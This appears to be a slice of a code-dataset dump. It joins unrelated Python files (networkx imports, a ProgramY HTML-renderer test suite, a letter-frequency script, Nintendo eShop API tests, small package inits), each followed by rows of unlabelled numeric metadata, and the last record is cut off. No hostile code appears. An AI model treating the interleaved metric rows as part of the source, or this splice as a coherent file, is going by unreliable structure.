networkx.algorithms import connectivity from networkx.algorithms import community from networkx.algorithms import coloring from networkx.algorithms import flow from networkx.algorithms import isomorphism from networkx.algorithms import link_analysis from networkx.algorithms import lowest_common_ancestors from networkx.algorithms import operators from networkx.algorithms import shortest_paths from networkx.algorithms import tournament from networkx.algorithms import traversal from networkx.algorithms import tree # Make certain functions from some of the previous subpackages available # to the user as direct imports from the `networkx` namespace. 
from networkx.algorithms.bipartite import complete_bipartite_graph from networkx.algorithms.bipartite import is_bipartite from networkx.algorithms.bipartite import project from networkx.algorithms.bipartite import projected_graph from networkx.algorithms.connectivity import all_pairs_node_connectivity from networkx.algorithms.connectivity import all_node_cuts from networkx.algorithms.connectivity import average_node_connectivity from networkx.algorithms.connectivity import edge_connectivity from networkx.algorithms.connectivity import edge_disjoint_paths from networkx.algorithms.connectivity import k_components from networkx.algorithms.connectivity import k_edge_components from networkx.algorithms.connectivity import k_edge_subgraphs from networkx.algorithms.connectivity import k_edge_augmentation from networkx.algorithms.connectivity import is_k_edge_connected from networkx.algorithms.connectivity import minimum_edge_cut from networkx.algorithms.connectivity import minimum_node_cut from networkx.algorithms.connectivity import node_connectivity from networkx.algorithms.connectivity import node_disjoint_paths from networkx.algorithms.connectivity import stoer_wagner from networkx.algorithms.flow import capacity_scaling from networkx.algorithms.flow import cost_of_flow from networkx.algorithms.flow import gomory_hu_tree from networkx.algorithms.flow import max_flow_min_cost from networkx.algorithms.flow import maximum_flow from networkx.algorithms.flow import maximum_flow_value from networkx.algorithms.flow import min_cost_flow from networkx.algorithms.flow import min_cost_flow_cost from networkx.algorithms.flow import minimum_cut from networkx.algorithms.flow import minimum_cut_value from networkx.algorithms.flow import network_simplex from networkx.algorithms.isomorphism import could_be_isomorphic from networkx.algorithms.isomorphism import fast_could_be_isomorphic from networkx.algorithms.isomorphism import faster_could_be_isomorphic from 
networkx.algorithms.isomorphism import is_isomorphic from networkx.algorithms.tree.branchings import maximum_branching from networkx.algorithms.tree.branchings import maximum_spanning_arborescence from networkx.algorithms.tree.branchings import minimum_branching from networkx.algorithms.tree.branchings import minimum_spanning_arborescence from networkx.algorithms.tree.branchings import ArborescenceIterator from networkx.algorithms.tree.coding import * from networkx.algorithms.tree.decomposition import * from networkx.algorithms.tree.mst import * from networkx.algorithms.tree.operations import * from networkx.algorithms.tree.recognition import *
48.976744
77
0.868154
779
6,318
6.93068
0.17715
0.271161
0.497129
0.311169
0.453973
0.308576
0.25727
0.123727
0.03334
0.03334
0
0
0.083571
6,318
128
78
49.359375
0.93247
0.035929
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2ddd7cf54ece7ec7f6ee4e0d74edd7c41af92128
24
py
Python
elones/__init__.py
nestorp/claim-diff_elones
3fe2c41fd39064d3fd210220d921ccf11e62880a
[ "MIT" ]
null
null
null
elones/__init__.py
nestorp/claim-diff_elones
3fe2c41fd39064d3fd210220d921ccf11e62880a
[ "MIT" ]
null
null
null
elones/__init__.py
nestorp/claim-diff_elones
3fe2c41fd39064d3fd210220d921ccf11e62880a
[ "MIT" ]
null
null
null
from elones.elo import *
24
24
0.791667
4
24
4.75
1
0
0
0
0
0
0
0
0
0
0
0
0.125
24
1
24
24
0.904762
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
932d3793483ebd52c5ee38df69cd292616dd870c
37
py
Python
napari/_qt/layers/__init__.py
OKaluza/napari
95a6afbbdb54a530b1eaca23037b8f98c7c8b064
[ "BSD-3-Clause" ]
null
null
null
napari/_qt/layers/__init__.py
OKaluza/napari
95a6afbbdb54a530b1eaca23037b8f98c7c8b064
[ "BSD-3-Clause" ]
4
2019-12-08T20:20:44.000Z
2020-01-16T21:57:33.000Z
napari/_qt/layers/__init__.py
OKaluza/napari
95a6afbbdb54a530b1eaca23037b8f98c7c8b064
[ "BSD-3-Clause" ]
null
null
null
from .util import create_qt_controls
18.5
36
0.864865
6
37
5
1
0
0
0
0
0
0
0
0
0
0
0
0.108108
37
1
37
37
0.909091
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
9332f75cb33857029582335c48fdabe5a50b32cd
18,900
py
Python
test/programytest/clients/render/test_html.py
cdoebler1/AIML2
ee692ec5ea3794cd1bc4cc8ec2a6b5e5c20a0d6a
[ "MIT" ]
345
2016-11-23T22:37:04.000Z
2022-03-30T20:44:44.000Z
test/programytest/clients/render/test_html.py
MikeyBeez/program-y
00d7a0c7d50062f18f0ab6f4a041068e119ef7f0
[ "MIT" ]
275
2016-12-07T10:30:28.000Z
2022-02-08T21:28:33.000Z
test/programytest/clients/render/test_html.py
VProgramMist/modified-program-y
f32efcafafd773683b3fe30054d5485fe9002b7d
[ "MIT" ]
159
2016-11-28T18:59:30.000Z
2022-03-20T18:02:44.000Z
import unittest import unittest.mock from programy.clients.render.html import HtmlRenderer class MockHtmlBotClient(object): def __init__(self): self._response = None self.configuration = unittest.mock.Mock() self.configuration.host = "127.0.0.1" self.configuration.port = "6666" self.configuration.api = "/api/web/v1.0/ask" def process_response(self, client_context, response): self._response = response class HtmlRendererTests(unittest.TestCase): def test_create_postback_url(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) postback = renderer.create_postback_url() self.assertIsNotNone(postback) self.assertEqual(postback, "#") def test_text_only(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "Hello world") self.assertEqual(mock_console._response, "Hello world") def test_url_button(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<button"><text>Hello</text><url>http://click.me</url></button>') self.assertEqual(mock_console._response, '<a class="programy" href="http://click.me">Hello</a>') def test_url_button_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<button class="class1" id="id1"><text>Hello</text><url>http://click.me</url></button>') self.assertEqual(mock_console._response, '<a class="class1 programy" id="id1" href="http://click.me">Hello</a>') def test_postback_button(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<button><text>Hello</text><postback>HELLO</postback></button>") self.assertEqual(mock_console._response, '<a class="programy" postback="HELLO" href="#">Hello</a>') def 
test_postback_button_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<button class="class1" id="id1"><text>Hello</text><postback>HELLO</postback></button>') self.assertEqual(mock_console._response, '<a class="class1 programy" id="id1" postback="HELLO" href="#">Hello</a>') def test_link(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<link><text>Hello</text><url>http://click.me</url></link>") self.assertEqual(mock_console._response, '<a class="programy" href="http://click.me">Hello</a>') def test_link_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<link class="class1" id="id1"><text>Hello</text><url>http://click.me</url></link>') self.assertEqual(mock_console._response, '<a class="class1 programy" id="id1" href="http://click.me">Hello</a>') def test_image(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<image>http://servusai.com/aiml.png</image>') self.assertEqual(mock_console._response, '<img class="programy" src="http://servusai.com/aiml.png" />') def test_image_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<image class="class1" id="id1">http://servusai.com/aiml.png</image>') self.assertEqual(mock_console._response, '<img class="class1 programy" id="id1" src="http://servusai.com/aiml.png" />') def test_video(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<video>http://servusai.com/aiml.mov</video>") self.assertEqual(mock_console._response, """<video class="programy" 
src="http://servusai.com/aiml.mov"> Sorry, your browser doesn't support embedded videos, but don't worry, you can <a href="http://servusai.com/aiml.mov">download it</a> and watch it with your favorite video player! </video>""") def test_video_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<video class="class1" id="id1">http://servusai.com/aiml.mov</video>') self.assertEqual(mock_console._response, """<video class="class1 programy" id="id1" src="http://servusai.com/aiml.mov"> Sorry, your browser doesn't support embedded videos, but don't worry, you can <a href="http://servusai.com/aiml.mov">download it</a> and watch it with your favorite video player! </video>""") def test_card(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<card><image>http://servusai.com/aiml.png</image><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card>') self.assertEqual(mock_console._response, '<div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div>') def test_card_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<card class="class1" id="id1"><image>http://servusai.com/aiml.png</image><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card>') self.assertEqual(mock_console._response, '<div class="class1 programy" id="id1"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div>') def test_carousel(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) 
self.assertIsNotNone(renderer) renderer.render("testuser", "<carousel><card><image>http://servusai.com/aiml.png</image><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card></carousel>") self.assertEqual(mock_console._response, '<div class="programy"><div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div></div>') def test_carousel_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<carousel class="class1" id="id1"><card><image>http://servusai.com/aiml.png</image><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card></carousel>') self.assertEqual(mock_console._response, '<div class="class1 programy" id="id1"><div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div></div>') def test_reply_with_postback(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<reply><text>Hello</text><postback>HELLO</postback></reply>") self.assertEqual(mock_console._response, '<a class="programy" postback="HELLO" href="#">Hello</a>') def test_reply_with_postback_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<reply class="class1" id="id1"><text>Hello</text><postback>HELLO</postback></reply>') self.assertEqual(mock_console._response, '<a class="class1 programy" id="id1" postback="HELLO" href="#">Hello</a>') def test_reply_without_postback(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) 
renderer.render("testuser", "<reply><text>Hello</text></reply>") self.assertEqual(mock_console._response, '<a class="programy" postback="Hello" href="#">Hello</a>') def test_reply_without_postback_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<reply class="class1" id="id1"><text>Hello</text></reply>') self.assertEqual(mock_console._response, '<a class="class1 programy" id="id1" postback="Hello" href="#">Hello</a>') def test_delay(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<delay><seconds>0</seconds></delay>") self.assertEqual(mock_console._response, '<div class="programy">...</div>') def test_delay_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<delay class="class1" id="id1" ><seconds>0</seconds></delay>') self.assertEqual(mock_console._response, '<div class="class1 programy" id="id1">...</div>') def test_split(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<split />") self.assertEqual(mock_console._response, '<br class="programy" />') def test_split_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<split class="class1" id="id1"/>') self.assertEqual(mock_console._response, '<br class="class1 programy" id="id1" />') def test_list(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<list><item>Item1</item><item>Item2</item></list>') self.assertEqual(mock_console._response, '<ul class="programy"><li>Item1</li><li>Item2</li></ul>') def test_list_with_children(self): 
mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<list><item>Hi</item><item><button"><text>Hello</text><url>http://click.me</url></button></item><item><button"><text>Goodbye</text><url>http://click.me</url></button></item></list>') print(mock_console._response) self.assertEqual(mock_console._response, '<ul class="programy"><li>Hi</li><li><a class="programy" postback="Hello" href="#">Hello</a></li><li><a class="programy" postback="Goodbye" href="#">Goodbye</a></li></ul>') def test_list_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<list class="class1" id="id1"><item>Item1</item><item>Item2</item></list>') self.assertEqual(mock_console._response, '<ul class="class1 programy" id="id1"><li>Item1</li><li>Item2</li></ul>') def test_olist(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<olist><item>Item1</item><item>Item2</item></olist>") self.assertEqual(mock_console._response, '<ol class="programy"><li>Item1</li><li>Item2</li></ol>') def test_olist_with_children(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<olist><item>Hi</item><item><button"><text>Hello</text><url>http://click.me</url></button></item><item><button"><text>Goodbye</text><url>http://click.me</url></button></item></olist>') print(mock_console._response) self.assertEqual(mock_console._response, '<ol class="programy"><li>Hi</li><li><a class="programy" postback="Hello" href="#">Hello</a></li><li><a class="programy" postback="Goodbye" href="#">Goodbye</a></li></ol>') def test_olist_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) 
renderer.render("testuser", '<olist class="class1" id="id1"><item>Item1</item><item>Item2</item></olist>') self.assertEqual(mock_console._response, '<ol class="class1 programy" id="id1"><li>Item1</li><li>Item2</li></ol>') def test_location(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", "<location />") self.assertEqual(mock_console._response, "") def test_location(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<location />') self.assertEqual(mock_console._response, "") def test_location_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) renderer.render("testuser", '<location class="class1 programy" id="id1"/>') self.assertEqual(mock_console._response, "") def test_tts(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", '<tts>Some speech</tts>') self.assertEqual(rendered, '') def test_tts_with_class_and_id(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", '<tts class="class1 programy" id="id1">Some speech</tts>') self.assertEqual(rendered, '') def test_card_with_xml_at_front(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", '<something>Some speech</something><card><image>http://servusai.com/aiml.png</image><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card>') self.assertEqual(rendered, '<something>Some speech</something><div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a 
href="http://click.me">Hello</a></div>') def test_card_with_xml_at_end(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", '<card><image>http://servusai.com/aiml.png</image><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card><something>Some speech</something>') self.assertEqual(rendered, '<div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div><something>Some speech</something>') def test_card_with_xml_at_front_and_end(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", '<something>Some speech</something><card><image>http://servusai.com/aiml.png</image><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card><something>Some speech</something>') self.assertEqual(rendered, '<something>Some speech</something><div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div><something>Some speech</something>') def test_card_with_text_at_front(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", 'Hello<card><image>http://servusai.com/aiml.png</image><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card>') self.assertEqual(rendered, 'Hello<div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div>') def test_card_with_text_at_end(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) 
self.assertIsNotNone(renderer) rendered = renderer.render("testuser", '<card><image>http://servusai.com/aiml.png</image><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card>Hello') self.assertEqual(rendered, '<div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div>Hello') def test_card_with_text_at_front_and_end(self): mock_console = MockHtmlBotClient() renderer = HtmlRenderer(mock_console) self.assertIsNotNone(renderer) rendered = renderer.render("testuser", 'Hello<card><image>http://servusai.com/aiml.png</image><title>Servusai</title><subtitle>Home of ProgramY</subtitle><button><text>Hello</text><url>http://click.me</url></button></card>Hello') self.assertEqual(rendered, 'Hello<div class="programy"><img src="http://servusai.com/aiml.png" /><h1>Servusai</h1><h2>Home of ProgramY</h2><a href="http://click.me">Hello</a></div>Hello')
47.487437
295
0.682751
2,275
18,900
5.536703
0.053626
0.101302
0.048825
0.10416
0.945538
0.93625
0.931566
0.916799
0.904097
0.886631
0
0.007859
0.151693
18,900
397
296
47.607053
0.777771
0
0
0.548148
0
0.166667
0.416243
0.079365
0
0
0
0
0.307407
1
0.159259
false
0
0.011111
0
0.177778
0.007407
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
937455ce267a0a002317e3699b375f3d42927b0c
43
py
Python
tests/src/preprocess/pack/__init__.py
pystatic/pystatic
e93d372e46adf8a8f697a71b80f3c88d26272607
[ "MIT" ]
null
null
null
tests/src/preprocess/pack/__init__.py
pystatic/pystatic
e93d372e46adf8a8f697a71b80f3c88d26272607
[ "MIT" ]
null
null
null
tests/src/preprocess/pack/__init__.py
pystatic/pystatic
e93d372e46adf8a8f697a71b80f3c88d26272607
[ "MIT" ]
null
null
null
class Pack: pass pack: Pack = Pack()
7.166667
19
0.581395
6
43
4.166667
0.5
0.64
0
0
0
0
0
0
0
0
0
0
0.302326
43
5
20
8.6
0.833333
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0
0
0.333333
0
1
1
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
6
faf36a282c7e31a319bb3cb80b67cbc168e29c41
2,642
py
Python
6_Dictionaries/challenge_24_code.py
PacktPublishing/The-Art-of-Doing-Code-40-Challenging-Python-Programs-Today
c25f63884e5fd3a66660d48cda597b9eab4ffeac
[ "MIT" ]
11
2021-01-06T13:55:04.000Z
2022-01-06T21:57:00.000Z
6_Dictionaries/challenge_24_code.py
PacktPublishing/The-Art-of-Doing-Code-40-Challenging-Python-Programs-Today
c25f63884e5fd3a66660d48cda597b9eab4ffeac
[ "MIT" ]
null
null
null
6_Dictionaries/challenge_24_code.py
PacktPublishing/The-Art-of-Doing-Code-40-Challenging-Python-Programs-Today
c25f63884e5fd3a66660d48cda597b9eab4ffeac
[ "MIT" ]
6
2021-01-07T02:24:54.000Z
2021-12-30T15:08:51.000Z
#Dictionaries Challenge 24: Frequency Analysis App from collections import Counter print("Welcome to the Frequency Analysis App") #List of elements to remove from all text for analysis non_letters = ['1','2','3','4','5','6','7','8','9','0',' ', '.','?','!',',','"',"'",':',';','(',')','%','$','&','#','\n','\t'] #Information for the first key key_phrase_1 key_phrase_1 = input("Enter a word or phrase to count the occurrence of each letter: ").lower().strip() #Removing all non letters from key_phrase_1 for non_letter in non_letters: key_phrase_1 = key_phrase_1.replace(non_letter, '') total_occurrences = len(key_phrase_1) #Create a counter object to tally the number of each letter letter_count = Counter(key_phrase_1) #Determine the frequency analysis for the message print("\nHere is the frequency analysis from key phrase 1: ") print("\n\tLetter\t\tOccurrence\tPercentage") for key, value in sorted(letter_count.items()): percentage = 100*value/total_occurrences percentage = round(percentage, 2) print("\t" + key + "\t\t" + str(value) + "\t\t" + str(percentage) + "%") #Make a list of letters from highest occurrence to lowest ordered_letter_count = letter_count.most_common() key_phrase_1_ordered_letters = [] for pair in ordered_letter_count: key_phrase_1_ordered_letters.append(pair[0]) #Print the list print("\nLetters ordered from highest occurrence to lowest: ") for letter in key_phrase_1_ordered_letters: print(letter, end='') #Information for the second key key_phrase_2 key_phrase_2 = input("\n\nEnter a word or phrase to count the occurrence of each letter: ").lower().strip() #Removing all non letters from key_phrase_2 for non_letter in non_letters: key_phrase_2 = key_phrase_2.replace(non_letter, '') total_occurrences = len(key_phrase_2) #Create a counter object to tally the number of each letter letter_count = Counter(key_phrase_2) #Determine the frequency analysis for the message print("\nHere is the frequency analysis from key phrase 2: ") 
print("\n\tLetter\t\tOccurrence\tPercentage") for key, value in sorted(letter_count.items()): percentage = 100*value/total_occurrences percentage = round(percentage, 2) print("\t" + key + "\t\t" + str(value) + "\t\t" + str(percentage) + "%") #Make a list of letters from highest occurrence to lowest ordered_letter_count = letter_count.most_common() key_phrase_2_ordered_letters = [] for pair in ordered_letter_count: key_phrase_2_ordered_letters.append(pair[0]) #Print the list print("\nLetters ordered from highest occurrence to lowest: ") for letter in key_phrase_2_ordered_letters: print(letter, end='')
37.742857
126
0.736563
404
2,642
4.621287
0.212871
0.106052
0.058918
0.049277
0.863417
0.830209
0.797001
0.797001
0.714515
0.714515
0
0.019298
0.137017
2,642
69
127
38.289855
0.799561
0.236185
0
0.512821
0
0
0.249501
0.035928
0
0
0
0
0
1
0
false
0
0.025641
0
0.025641
0.282051
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
faf8e840690ce6373d96de68d881565bf751b26b
3,703
py
Python
tests/test_noa/test_game_info.py
Pooroomoo/nintendeals
993f4d159ff405ed82cd2bb023c7b75d921d0acb
[ "MIT" ]
37
2020-04-30T13:48:02.000Z
2022-03-09T04:55:54.000Z
tests/test_noa/test_game_info.py
Pooroomoo/nintendeals
993f4d159ff405ed82cd2bb023c7b75d921d0acb
[ "MIT" ]
4
2020-05-09T03:17:44.000Z
2021-04-28T00:53:55.000Z
tests/test_noa/test_game_info.py
Pooroomoo/nintendeals
993f4d159ff405ed82cd2bb023c7b75d921d0acb
[ "MIT" ]
5
2020-07-22T06:42:27.000Z
2022-02-07T22:35:57.000Z
from unittest import TestCase from nintendeals import noa from nintendeals.commons.enumerates import Features, Ratings, Regions, Platforms class TestGameInfo(TestCase): def test_game_info_non_existant(self): game = noa.game_info(nsuid="60010000000000") self.assertIsNone(game) game = noa.game_info(slug="unknown") self.assertIsNone(game) game = noa.game_info() self.assertIsNone(game) def test_game_info_3ds(self): game = noa.game_info(nsuid="50010000023235") self.assertEqual(game.platform, Platforms.NINTENDO_3DS) self.assertEqual(game.region, Regions.NA) self.assertEqual(game.title, "Super Smash Bros.") self.assertEqual(game.nsuid, "50010000023235") # self.assertEqual(game.unique_id, "AXC") TODO self.assertEqual(game.slug, "super-smash-bros-for-nintendo-3ds") self.assertEqual(game.players, 4) self.assertFalse(game.free_to_play) self.assertEqual(game.rating, (Ratings.ESRB, "Everyone 10+")) self.assertEqual(game.release_date.year, 2014) self.assertEqual(game.release_date.month, 10) self.assertEqual(game.release_date.day, 3) self.assertIn("Nintendo", game.publishers) self.assertEqual(game.features.get(Features.DEMO), True) self.assertEqual(game.eshop.ca_en, "https://www.nintendo.com/en_CA/games/detail/super-smash-bros-for-nintendo-3ds") def test_game_info_switch(self): game = noa.game_info(slug="super-smash-bros-ultimate-switch") self.assertEqual(game.platform, Platforms.NINTENDO_SWITCH) self.assertEqual(game.region, Regions.NA) self.assertEqual(game.title, "Super Smash Bros.™ Ultimate") self.assertEqual(game.nsuid, "70010000012332") # self.assertEqual(game.unique_id, "AAAB") TODO self.assertEqual(game.slug, "super-smash-bros-ultimate-switch") self.assertEqual(game.players, 8) self.assertFalse(game.free_to_play) self.assertEqual(game.rating, (Ratings.ESRB, "Everyone 10+")) self.assertEqual(game.release_date.year, 2018) self.assertEqual(game.release_date.month, 12) self.assertEqual(game.release_date.day, 7) self.assertIn("Nintendo", game.publishers) 
self.assertEqual(game.features.get(Features.DEMO), False) self.assertEqual(game.features.get(Features.DLC), True) self.assertEqual(game.features.get(Features.NSO_REQUIRED), True) self.assertEqual(game.features.get(Features.SAVE_DATA_CLOUD), True) self.assertEqual(game.eshop.ca_fr, "https://www.nintendo.com/fr_CA/games/detail/super-smash-bros-ultimate-switch") def test_game_info_wiiu(self): game = noa.game_info(nsuid="20010000007686") self.assertEqual(game.platform, Platforms.NINTENDO_WIIU) self.assertEqual(game.region, Regions.NA) self.assertEqual(game.title, "Super Smash Bros.") self.assertEqual(game.nsuid, "20010000007686") # self.assertEqual(game.unique_id, "AXF") TODO self.assertEqual(game.slug, "super-smash-bros-for-wii-u") self.assertEqual(game.players, 8) self.assertFalse(game.free_to_play) self.assertEqual(game.rating, (Ratings.ESRB, "Everyone 10+")) self.assertEqual(game.release_date.year, 2014) self.assertEqual(game.release_date.month, 11) self.assertEqual(game.release_date.day, 21) self.assertIn("Nintendo", game.publishers) self.assertEqual(game.features.get(Features.DEMO), False) self.assertEqual(game.eshop.us_en, "https://www.nintendo.com/en_US/games/detail/super-smash-bros-for-wii-u")
37.40404
123
0.693222
464
3,703
5.431034
0.209052
0.25
0.316667
0.092857
0.834921
0.757143
0.534524
0.473413
0.464286
0.396429
0
0.039183
0.179854
3,703
98
124
37.785714
0.789924
0.037267
0
0.370968
0
0.048387
0.156698
0.034541
0
0
0
0.010204
0.774194
1
0.064516
false
0
0.048387
0
0.129032
0
0
0
0
null
1
1
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
1
0
0
0
0
0
0
0
0
0
6
87a6470974c74cade74a45a431e262d5a22760b9
27
py
Python
flights/__init__.py
nabakirov/flight_prices
356e53ff01dc4933de39c406e4fb7e8e36a0423e
[ "MIT" ]
null
null
null
flights/__init__.py
nabakirov/flight_prices
356e53ff01dc4933de39c406e4fb7e8e36a0423e
[ "MIT" ]
null
null
null
flights/__init__.py
nabakirov/flight_prices
356e53ff01dc4933de39c406e4fb7e8e36a0423e
[ "MIT" ]
null
null
null
from . import tasks, views
13.5
26
0.740741
4
27
5
1
0
0
0
0
0
0
0
0
0
0
0
0.185185
27
1
27
27
0.909091
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
87c96b833c32f9879d5d058c331364f12d105119
35
py
Python
classifier/collaters/__init__.py
JRC1995/Continuous-RvNN
b33bdbd2f80119dc0fa3ed6d44865a3d45bc1e81
[ "MIT" ]
9
2021-06-08T13:29:26.000Z
2022-03-29T17:29:46.000Z
classifier/collaters/__init__.py
JRC1995/Continuous-RvNN
b33bdbd2f80119dc0fa3ed6d44865a3d45bc1e81
[ "MIT" ]
null
null
null
classifier/collaters/__init__.py
JRC1995/Continuous-RvNN
